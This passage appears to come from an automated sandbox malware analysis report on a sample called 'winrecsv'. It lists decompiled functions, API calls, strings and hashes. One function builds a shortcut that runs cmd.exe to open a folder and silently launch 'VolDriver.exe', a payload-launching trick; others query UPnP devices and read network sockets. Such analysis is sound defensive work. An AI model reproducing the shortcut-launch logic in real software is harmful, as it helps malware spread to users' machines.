                                                                                  0x0040e3d4
                                                                                  0x0040e378
                                                                                  0x0040e37e
                                                                                  0x0040e37e
                                                                                  0x0040e33e
                                                                                  0x0040e341
                                                                                  0x0040e341

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E83B,00000000), ref: 0040E34A
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E83B,00000000), ref: 0040E36E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3168844106-0
                                                                                  • Opcode ID: 25b9462c7ec89b53bcd70d4e63073bcbe0ea2bd8188f1567c139e1435a39efe3
                                                                                  • Instruction ID: 62d1bf2d84e0e1ba2e0a99c8f5ab924b94ee3ffd36670832191e74fbf46375e2
                                                                                  • Opcode Fuzzy Hash: 25b9462c7ec89b53bcd70d4e63073bcbe0ea2bd8188f1567c139e1435a39efe3
                                                                                  • Instruction Fuzzy Hash: F231D172201605ABC310ABB6EC48AD7B7E8FB44724F04893EF95DD3251DB39A4548B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CCD1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"deviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                  			}




                                                                                  0x0040ccd1
                                                                                  0x0040ccd1
                                                                                  0x0040ccd1
                                                                                  0x0040ccd7
                                                                                  0x0040cce0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cce6
                                                                                  0x0040cce6
                                                                                  0x0040ccf0
                                                                                  0x0040ccf4
                                                                                  0x0040ccfd
                                                                                  0x0040cd05
                                                                                  0x0040cde3
                                                                                  0x00000000
                                                                                  0x0040cd15
                                                                                  0x0040cd15
                                                                                  0x0040cd15
                                                                                  0x0040cd1f
                                                                                  0x0040cd28
                                                                                  0x0040cd33
                                                                                  0x0040cd43
                                                                                  0x0040cd54
                                                                                  0x0040cd56
                                                                                  0x0040cd67
                                                                                  0x0040cd6e
                                                                                  0x0040cd70
                                                                                  0x0040cd70
                                                                                  0x0040cd7a
                                                                                  0x0040cd83
                                                                                  0x0040cd8b
                                                                                  0x0040cd93
                                                                                  0x0040cda3
                                                                                  0x0040cda8
                                                                                  0x0040cda8
                                                                                  0x0040cdab
                                                                                  0x0040cdaf
                                                                                  0x0040cdaf
                                                                                  0x0040cdb5
                                                                                  0x0040cdc1
                                                                                  0x0040cdc1
                                                                                  0x0040cd6e
                                                                                  0x0040cdc3
                                                                                  0x0040cdc7
                                                                                  0x0040cdc7
                                                                                  0x0040cdcd
                                                                                  0x0040cdd1
                                                                                  0x0040cdd5
                                                                                  0x0040cde1
                                                                                  0x00000000
                                                                                  0x0040cde1
                                                                                  0x0040cdd1
                                                                                  0x00000000
                                                                                  0x0040cd05
                                                                                  0x0040cde8
                                                                                  0x0040cdee

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction ID: 6e690da79745c02a31a5bb20c3c2194b08e0ef47a7b2c4a2d0bea9277cba1ccd
                                                                                  • Opcode Fuzzy Hash: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction Fuzzy Hash: 5A31CA75A1020ADFCB04DF99D884BEFBBB5BF88304F108669E515B7390D778A981CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CAF1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"serviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                  			}




                                                                                  0x0040caf1
                                                                                  0x0040caf1
                                                                                  0x0040caf1
                                                                                  0x0040caf7
                                                                                  0x0040cb00
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cb06
                                                                                  0x0040cb06
                                                                                  0x0040cb10
                                                                                  0x0040cb14
                                                                                  0x0040cb1d
                                                                                  0x0040cb25
                                                                                  0x0040cc03
                                                                                  0x00000000
                                                                                  0x0040cb35
                                                                                  0x0040cb35
                                                                                  0x0040cb35
                                                                                  0x0040cb3f
                                                                                  0x0040cb48
                                                                                  0x0040cb53
                                                                                  0x0040cb63
                                                                                  0x0040cb74
                                                                                  0x0040cb76
                                                                                  0x0040cb87
                                                                                  0x0040cb8e
                                                                                  0x0040cb90
                                                                                  0x0040cb90
                                                                                  0x0040cb9a
                                                                                  0x0040cba3
                                                                                  0x0040cbab
                                                                                  0x0040cbb3
                                                                                  0x0040cbc3
                                                                                  0x0040cbc8
                                                                                  0x0040cbc8
                                                                                  0x0040cbcb
                                                                                  0x0040cbcf
                                                                                  0x0040cbcf
                                                                                  0x0040cbd5
                                                                                  0x0040cbe1
                                                                                  0x0040cbe1
                                                                                  0x0040cb8e
                                                                                  0x0040cbe3
                                                                                  0x0040cbe7
                                                                                  0x0040cbe7
                                                                                  0x0040cbed
                                                                                  0x0040cbf1
                                                                                  0x0040cbf5
                                                                                  0x0040cc01
                                                                                  0x00000000
                                                                                  0x0040cc01
                                                                                  0x0040cbf1
                                                                                  0x00000000
                                                                                  0x0040cb25
                                                                                  0x0040cc08
                                                                                  0x0040cc0e

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction ID: 5740a4334c3a4aa6fa35b80b2035fb24052f91dcc8a06d59cd48ed0533e674c8
                                                                                  • Opcode Fuzzy Hash: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction Fuzzy Hash: 5731EA74A0020ADFCB14CF99D885BEFB7B5BF88304F108669E515B7390D778A985CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00407CC0(signed int _a4, signed int _a8) {
                                                                                  
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 | _a4;
                                                                                  				_a8 = _a8 | _a8;
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                  				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                  				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                  				return _a4;
                                                                                  			}



                                                                                  0x00407ccd
                                                                                  0x00407cde
                                                                                  0x00407ce7
                                                                                  0x00407cea
                                                                                  0x00407d00
                                                                                  0x00407d1c
                                                                                  0x00407d25
                                                                                  0x00407d28
                                                                                  0x00407d3e
                                                                                  0x00407d5a
                                                                                  0x00407d63
                                                                                  0x00407d66
                                                                                  0x00407d72

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl_aullshr
                                                                                  • String ID:
                                                                                  • API String ID: 673498613-0
                                                                                  • Opcode ID: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction ID: 2c2ab6fddce176d3a51b6a04538834b606437382d20241cd374fb35f0ceee124
                                                                                  • Opcode Fuzzy Hash: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction Fuzzy Hash: B8111F32504518AB8B20EF5EC88268ABBD6EF84361B15C136FC2CDF759D634D9514BD4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 54%
                                                                                  			E00404980(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				short _v540;
                                                                                  				char* _t37;
                                                                                  				intOrPtr _t42;
                                                                                  
                                                                                  				__imp__CoInitialize(0);
                                                                                  				_t37 =  &_v12;
                                                                                  				__imp__CoCreateInstance(0x410348, 0, 1, 0x410338, _t37);
                                                                                  				_v8 = _t37;
                                                                                  				if(_v8 >= 0 && _v12 != 0) {
                                                                                  					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x4140cc, 0x4140cc);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                  					_t42 =  *_v12;
                                                                                  					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                  					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x410358,  &_v16);
                                                                                  					if(_v8 >= 0 && _v16 != 0) {
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  					}
                                                                                  					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  				}
                                                                                  				return _t37;
                                                                                  			}









                                                                                  0x0040498b
                                                                                  0x00404991
                                                                                  0x004049a3
                                                                                  0x004049a9
                                                                                  0x004049b0
                                                                                  0x004049d6
                                                                                  0x004049f0
                                                                                  0x004049fd
                                                                                  0x00404a03
                                                                                  0x00404a06
                                                                                  0x00404a16
                                                                                  0x00404a2b
                                                                                  0x00404a43
                                                                                  0x00404a4a
                                                                                  0x00404a64
                                                                                  0x00404a72
                                                                                  0x00404a72
                                                                                  0x00000000
                                                                                  0x00404a80
                                                                                  0x00404a85

                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0040498B
                                                                                  • CoCreateInstance.OLE32(00410348,00000000,00000001,00410338,?), ref: 004049A3
                                                                                  • wsprintfW.USER32 ref: 004049D6
                                                                                  Strings
                                                                                  • %windir%\System32\cmd.exe, xrefs: 004049DF
                                                                                  • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 004049CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstancewsprintf
                                                                                  • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                  • API String ID: 2038452267-2473591295
                                                                                  • Opcode ID: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction ID: 67ce22acd86be46554e689b187cabead6fbc8e336e1921382d0bb77877987f96
                                                                                  • Opcode Fuzzy Hash: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction Fuzzy Hash: F431BA75A40208EFCB04DF98C885EDEB7B5EF88704F108299E619A73A5D774AE81CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 46%
                                                                                  			E004078B0(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                  				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                  				return _v12;
                                                                                  			}





                                                                                  0x004078bb
                                                                                  0x004078be
                                                                                  0x004078ca
                                                                                  0x004078cd
                                                                                  0x004078d9
                                                                                  0x004078dc
                                                                                  0x004078e8
                                                                                  0x004078eb
                                                                                  0x004078f7
                                                                                  0x004078fa
                                                                                  0x00407906
                                                                                  0x0040790b
                                                                                  0x0040790e
                                                                                  0x0040791c

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl
                                                                                  • String ID:
                                                                                  • API String ID: 435966717-0
                                                                                  • Opcode ID: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction ID: 50bcbbfbc9b263382ea6c403a771187ef31099e9fa81d89d9fbd392b00d1843e
                                                                                  • Opcode Fuzzy Hash: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction Fuzzy Hash: CDF08132A01028EB8720EEEFC4428CAF7E69F88364B118136F818E7660E9709C1547F2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 29%
                                                                                  			E0040EDD0(char _a4) {
                                                                                  				long _v4;
                                                                                  				struct _OVERLAPPED* _v8;
                                                                                  				long _v12;
                                                                                  				void* __ebx;
                                                                                  				signed int _t31;
                                                                                  				signed int _t32;
                                                                                  				signed int _t36;
                                                                                  				struct _OVERLAPPED* _t38;
                                                                                  				long _t43;
                                                                                  				char _t51;
                                                                                  				struct _OVERLAPPED* _t52;
                                                                                  				long* _t54;
                                                                                  
                                                                                  				_t54 =  &_v12;
                                                                                  				_t51 = _a4;
                                                                                  				_t52 = 0;
                                                                                  				_v4 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                  				_t43 = _v12;
                                                                                  				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;
                                                                                  				if(_t43 == 0) {
                                                                                  					return _t32;
                                                                                  				}
                                                                                  				do {
                                                                                  					if(_t32 == 0) {
                                                                                  						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                  						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                  						if(_t38 == 0) {
                                                                                  							__imp__#111();
                                                                                  							_t52 = _t38;
                                                                                  						}
                                                                                  					}
                                                                                  					_push(_t52);
                                                                                  					E0040EBE0(_v8, _v4, _v12);
                                                                                  					_t54 =  &(_t54[1]);
                                                                                  					_t52 = 0;
                                                                                  					_v4 = 0;
                                                                                  					_v12 = 0;
                                                                                  					_v8 = 0;
                                                                                  					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                  					_t43 = _v12;
                                                                                  					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                  				} while (_t43 != 0);
                                                                                  				return _t32;
                                                                                  			}















                                                                                  0x0040edd0
                                                                                  0x0040eddc
                                                                                  0x0040edf3
                                                                                  0x0040edf7
                                                                                  0x0040edfb
                                                                                  0x0040edff
                                                                                  0x0040ee03
                                                                                  0x0040ee05
                                                                                  0x0040ee0b
                                                                                  0x0040ee10
                                                                                  0x0040ee8f
                                                                                  0x0040ee8f
                                                                                  0x0040ee13
                                                                                  0x0040ee15
                                                                                  0x0040ee27
                                                                                  0x0040ee2f
                                                                                  0x0040ee37
                                                                                  0x0040ee39
                                                                                  0x0040ee3f
                                                                                  0x0040ee3f
                                                                                  0x0040ee37
                                                                                  0x0040ee4d
                                                                                  0x0040ee4e
                                                                                  0x0040ee53
                                                                                  0x0040ee69
                                                                                  0x0040ee6d
                                                                                  0x0040ee71
                                                                                  0x0040ee75
                                                                                  0x0040ee79
                                                                                  0x0040ee7b
                                                                                  0x0040ee81
                                                                                  0x0040ee84
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE03
                                                                                  • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040EE2F
                                                                                  • WSAGetLastError.WS2_32 ref: 0040EE39
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE79
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                  • String ID:
                                                                                  • API String ID: 2074799992-0
                                                                                  • Opcode ID: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction ID: bb54af95703917af121ac1969caf4c30c918fe6ab3e07cce6cf93c7135daf7d6
                                                                                  • Opcode Fuzzy Hash: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction Fuzzy Hash: 6D2151B15083159BC200CF55D840D5BB7E8BFCCB54F044A1EF598A3250D734EA49CBAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB08
                                                                                  • WSAGetLastError.WS2_32(?,?,0040F024), ref: 0040EB10
                                                                                  • Sleep.KERNEL32(00000001,?,?,0040F024), ref: 0040EB26
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Recv$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 3668019968-0
                                                                                  • Opcode ID: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction ID: d9337b9861168a889e2dcd888c4c975a75ea967e12d624b3d4e9d1b891e0ae49
                                                                                  • Opcode Fuzzy Hash: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction Fuzzy Hash: 99117972104301AFD710DF65EC84AEBB7ECEB88710F40092AF556D2140E6B9E94997B6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
